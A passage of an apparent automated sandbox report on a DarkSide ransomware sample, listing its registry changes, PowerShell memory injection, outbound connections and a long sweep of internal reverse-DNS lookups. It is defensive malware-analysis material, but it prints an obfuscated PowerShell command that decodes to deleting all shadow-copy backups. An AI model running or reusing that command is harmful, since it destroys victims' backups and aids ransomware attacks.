| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\bf9fb421.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\bf9fb421.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421\ = "bf9fb421" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\bf9fb421.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2780 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2780 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 48.169.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | temisleyes.com | udp |
| HK | 154.219.131.251:443 | temisleyes.com | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
